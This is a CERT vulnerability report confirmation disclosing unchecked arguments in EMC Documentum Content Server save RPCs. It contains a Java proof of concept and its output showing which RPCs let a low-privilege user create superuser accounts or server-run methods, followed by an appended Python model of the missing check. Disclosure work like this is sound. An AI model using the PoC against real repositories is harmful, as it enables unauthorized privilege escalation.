Vulnerability Report Confirmation - [VRF#HX5OLZ0F]

Your vulnerability report has been successfully received. The Report Tracking ID assigned to this report is VRF#HX5OLZ0F. Details of your report are listed below. If you have any questions or require additional information, please call the CERT Hotline at +1 412-268-7090 or send email to cert@cert.org, referencing this Report Tracking ID: VRF#HX5OLZ0F.

------------------------------------------------------------------------

Vulnerability Report

Name: Andrey B. Panfilov
Organization: independent
Email Address: andrew@panfilov.tel

Vulnerability Description:

Backdoors in CVE-2014-2514. When fixing the vulnerabilities, the vendor left 5 ways to elevate privileges using the same technique as described in VRF#HUFG9EBA: Documentum Content Server still does not check input arguments for some RPC commands.

Slightly modified PoC from VRF#HUFG9EBA (the only difference is that save operations are now performed against new objects, i.e. an attacker is able to create new malicious docbase methods or users with superuser privileges):

==========================================8<=============================================================
import java.util.*;

import com.documentum.fc.client.*;
import com.documentum.fc.client.impl.objectmanager.TypeMechanics;
import com.documentum.fc.common.*;

/**
 * @author Andrey B. Panfilov
 */
public class Test {

    public static void main(String[] argv) throws Exception {
        String docbase = argv[0];
        String userName = argv[1];
        String password = argv[2];
        IDfSession session = null;
        try {
            session = new DfClient().newSession(docbase, new DfLoginInfo(
                    userName, password));
            IDfUser user = session.getUser(null);
            if (user.isSuperUser() || user.isSystemAdmin()) {
                System.out.println("User " + userName
                        + " has too wide privileges, choose different one");
                System.exit(0);
            }
            int len = 0;
            // every save RPC known to DFC's type mechanics, in discovery order
            Set<String> saveMethods = new LinkedHashSet<String>();
            for (Object o : TypeMechanics.getAllInstances()) {
                String methodName = ((TypeMechanics) o).getSaveMethod();
                saveMethods.add(methodName);
                if (methodName.length() > len) {
                    len = methodName.length();
                }
            }
            // fresh object ids from the server: type tag 16 = dm_method, 17 = dm_user
            List<String> ids = getNextIds(session, 16, saveMethods.size());
            Iterator<String> idIterator = ids.iterator();
            for (String method : saveMethods) {
                System.out.format("%-" + String.valueOf(len + 1) + "s: %s\n",
                        method, "is "
                                + (checkDmMethod(session, method,
                                        idIterator.next()) ? "" : "not ")
                                + "vulnerable for dm_method objects");
            }
            ids = getNextIds(session, 17, saveMethods.size());
            idIterator = ids.iterator();
            for (String method : saveMethods) {
                System.out.format("%-" + String.valueOf(len + 1) + "s: %s\n",
                        method, "is "
                                + (checkDmUser(session, method,
                                        idIterator.next()) ? "" : "not ")
                                + "vulnerable for dm_user objects");
            }
        } finally {
            if (session != null) {
                session.disconnect();
            }
        }
    }

    public static Boolean checkDmUser(IDfSession session, String method,
            String id) throws DfException {
        String userName = String.valueOf(System.currentTimeMillis());
        try {
            session.beginTrans();
            IDfList params = new DfList(new String[] {"OBJECT_TYPE",
                    "IS_NEW_OBJECT", "i_vstamp", "user_name",
                    "user_login_name", "user_os_name", "user_privileges", });
            IDfList types = new DfList(new String[] {"S", "B", "I", "S",
                    "S", "S", "I" });
            IDfList values = new DfList(new String[] {"dm_user", "T",
                    String.valueOf(0), userName, userName, userName,
                    String.valueOf(16) });
            try {
                session.apply(id, method, params, types, values);
            } catch (DfException ex) {
                // ignore
            }
            IDfUser object = (IDfUser) session.getObject(DfId.valueOf(id));
            if (userName.equals(object.getString("user_name"))) {
                return true;
            } else {
                return false;
            }
        } catch (DfException ex) {
            return false;
        } finally {
            // the check only observes the result; nothing is committed
            session.abortTrans();
        }
    }

    public static Boolean checkDmMethod(IDfSession session, String method,
            String id) throws DfException {
        String methodVerb = String.valueOf(System.currentTimeMillis());
        try {
            session.beginTrans();
            IDfUser user = session.getUser(null);
            IDfList params = new DfList(new String[] {"OBJECT_TYPE",
                    "IS_NEW_OBJECT", "i_vstamp", "object_name",
                    "r_object_type", "acl_name", "owner_name", "owner_permit",
                    "run_as_server", "method_verb", });
            IDfList types = new DfList(new String[] {"S", "B", "I", "S", "S",
                    "S", "S", "I", "B", "S", });
            IDfList values = new DfList(new String[] {"dm_method", "T",
                    String.valueOf(0), String.valueOf(methodVerb), "dm_method",
                    user.getACLName(), user.getUserName(), String.valueOf(7),
                    "T", String.valueOf(methodVerb), });
            try {
                session.apply(id, method, params, types, values);
            } catch (DfException ex) {
                // ignore
            }
            IDfSysObject object = (IDfSysObject) session.getObject(DfId
                    .valueOf(id));
            if (methodVerb.equals(object.getString("method_verb"))) {
                return true;
            } else {
                return false;
            }
        } catch (DfException ex) {
            return false;
        } finally {
            session.abortTrans();
        }
    }

    private static List<String> getNextIds(IDfSession session, int tag,
            int howMany) throws DfException {
        IDfList params = new DfList(new String[] {"TAG", "HOW_MANY", });
        IDfList types = new DfList(new String[] {"I", "I", });
        IDfList values = new DfList(new String[] {String.valueOf(tag),
                String.valueOf(howMany), });
        IDfCollection collection = session.apply(DfId.DF_NULLID.getId(),
                "NEXT_ID_LIST", params, types, values);
        List<String> result = new ArrayList<String>();
        try {
            while (collection.next()) {
                for (int i = 0, n = collection.getValueCount("next_id"); i < n; i++) {
                    result.add(collection.getRepeatingString("next_id", i));
                }
            }
        } finally {
            collection.close();
        }
        return result;
    }
}
==========================================>8=============================================================

==========================================8<=============================================================
~]$ java Test repo user password
SAVE                      : is not vulnerable for dm_method objects
ContainmentSave           : is not vulnerable for dm_method objects
SAVE_CONT_ATTRS           : is not vulnerable for dm_method objects
SysObjSave                : is not vulnerable for dm_method objects
FolderSave                : is not vulnerable for dm_method objects
CabinetSave               : is not vulnerable for dm_method objects
AssemblySave              : is not vulnerable for dm_method objects
SET_STORAGE               : is not vulnerable for dm_method objects
UserSave                  : is not vulnerable for dm_method objects
GroupSave                 : is not vulnerable for dm_method objects
RegTableSave              : is not vulnerable for dm_method objects
RouterSave                : is not vulnerable for dm_method objects
InboxItemSave             : is not vulnerable for dm_method objects
SAVE_FORMAT               : is not vulnerable for dm_method objects
MAKE_DUMP                 : is not vulnerable for dm_method objects
RelationSave              : is not vulnerable for dm_method objects
MAKE_FTINDEX              : is not vulnerable for dm_method objects
RelationTypeSave          : is not vulnerable for dm_method objects
DocbaseIdMapSave          : is not vulnerable for dm_method objects
ACLSave                   : is vulnerable for dm_method objects
PolicySave                : is not vulnerable for dm_method objects
ReferenceSave             : is vulnerable for dm_method objects
WflowSave                 : is not vulnerable for dm_method objects
IPKGSave                  : is not vulnerable for dm_method objects
WITEMSave                 : is not vulnerable for dm_method objects
dmAuditTrailSave          : is vulnerable for dm_method objects
AliasSetSave              : is not vulnerable for dm_method objects
LiteObjSave               : is not vulnerable for dm_method objects
PARTITION_SCHEME_SAVE     : is not vulnerable for dm_method objects
dmScopeConfigSave         : is not vulnerable for dm_method objects
dmDisplayConfigSave       : is not vulnerable for dm_method objects
CLIENT_RIGHTS_DOMAIN_SAVE : is not vulnerable for dm_method objects
SAVE                      : is not vulnerable for dm_user objects
ContainmentSave           : is not vulnerable for dm_user objects
SAVE_CONT_ATTRS           : is not vulnerable for dm_user objects
SysObjSave                : is not vulnerable for dm_user objects
FolderSave                : is not vulnerable for dm_user objects
CabinetSave               : is not vulnerable for dm_user objects
AssemblySave              : is not vulnerable for dm_user objects
SET_STORAGE               : is not vulnerable for dm_user objects
UserSave                  : is not vulnerable for dm_user objects
GroupSave                 : is not vulnerable for dm_user objects
RegTableSave              : is not vulnerable for dm_user objects
RouterSave                : is not vulnerable for dm_user objects
InboxItemSave             : is not vulnerable for dm_user objects
SAVE_FORMAT               : is not vulnerable for dm_user objects
MAKE_DUMP                 : is not vulnerable for dm_user objects
RelationSave              : is not vulnerable for dm_user objects
MAKE_FTINDEX              : is not vulnerable for dm_user objects
RelationTypeSave          : is not vulnerable for dm_user objects
DocbaseIdMapSave          : is not vulnerable for dm_user objects
ACLSave                   : is not vulnerable for dm_user objects
PolicySave                : is not vulnerable for dm_user objects
ReferenceSave             : is vulnerable for dm_user objects
WflowSave                 : is not vulnerable for dm_user objects
IPKGSave                  : is not vulnerable for dm_user objects
WITEMSave                 : is not vulnerable for dm_user objects
dmAuditTrailSave          : is vulnerable for dm_user objects
AliasSetSave              : is not vulnerable for dm_user objects
LiteObjSave               : is not vulnerable for dm_user objects
PARTITION_SCHEME_SAVE     : is not vulnerable for dm_user objects
dmScopeConfigSave         : is not vulnerable for dm_user objects
dmDisplayConfigSave       : is not vulnerable for dm_user objects
CLIENT_RIGHTS_DOMAIN_SAVE : is not vulnerable for dm_user objects
==========================================>8=============================================================

Can we provide your name to the vendor? Yes
Do you want to be publicly acknowledged? Yes
Vendor Contact Status: will not contact
Vendor Name: EMC
Affected System Configurations: All versions of EMC Documentum Content Server
Is the vulnerability being exploited? Yes
Is there a public exploit? No
Date: 2014-07-03T02:17:53
Report Tracking ID: VRF#HX5OLZ0F
CERT Tracking IDs: VU#315340

------------------------------------------------------------------------
©2014 Carnegie Mellon University
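A toy model of the server-side argument check the report says these save RPCs lack, added here as an illustration and not code from the report or from EMC. The type table, the privilege bits and the rules are assumptions; only the RPC parameter names come from the PoC. It puts the vulnerable pattern (trusting OBJECT_TYPE from the client) beside a hardened dispatcher, and a scan that mirrors the PoC's loop over save methods.

```python
# Added example, not code from the report or from EMC: a toy model of the
# argument check the report says the save RPCs lack. The type table, the
# privilege bits and the rules are assumptions; parameter names are the PoC's.

SYSADMIN, SUPERUSER = 8, 16   # user_privileges bits (assumed)
PRIVILEGED = SYSADMIN | SUPERUSER

# Object types each save RPC is meant to handle (assumed table).
SAVE_METHOD_TYPES = {
    "UserSave": {"dm_user"},
    "ACLSave": {"dm_acl"},
    "ReferenceSave": {"dm_reference"},
    "dmAuditTrailSave": {"dm_audittrail"},
}
# Types whose creation and listed attributes need privileges (assumed).
GUARDED_TYPES = {
    "dm_user": {"user_privileges"},
    "dm_method": {"run_as_server", "method_verb"},
}

def weak_dispatch(method, args, caller_privs):
    """Vulnerable pattern: OBJECT_TYPE is trusted from the client and no
    per-type check runs, so any save RPC creates an object of any type."""
    if method not in SAVE_METHOD_TYPES:
        return "rejected: unknown method"
    return "saved " + args["OBJECT_TYPE"]

def hardened_dispatch(method, args, caller_privs):
    """Validate type and privileges before the object is written."""
    otype = args.get("OBJECT_TYPE")
    if otype not in SAVE_METHOD_TYPES.get(method, ()):
        return "rejected: %s does not handle %s" % (method, otype)
    if otype in GUARDED_TYPES and not caller_privs & PRIVILEGED:
        if args.get("IS_NEW_OBJECT") == "T":
            return "rejected: creating %s needs privileges" % otype
        touched = GUARDED_TYPES[otype] & set(args)
        if touched:
            return "rejected: %s need privileges" % ",".join(sorted(touched))
    return "saved " + otype

def accepting_methods(dispatch, args, caller_privs=0):
    """Mirror of the PoC's scan: which save RPCs accept these arguments."""
    return [m for m in SAVE_METHOD_TYPES
            if dispatch(m, args, caller_privs).startswith("saved")]

# Constructed copy of the PoC's dm_user arguments (user_privileges 16).
POC_USER = {"OBJECT_TYPE": "dm_user", "IS_NEW_OBJECT": "T", "i_vstamp": 0,
            "user_name": "x", "user_login_name": "x", "user_os_name": "x",
            "user_privileges": SUPERUSER}
```

With the weak dispatcher every save method in the table accepts the dm_user arguments, which is the shape of the PoC's "is vulnerable" lines; the hardened one accepts them only from UserSave and only for a privileged caller.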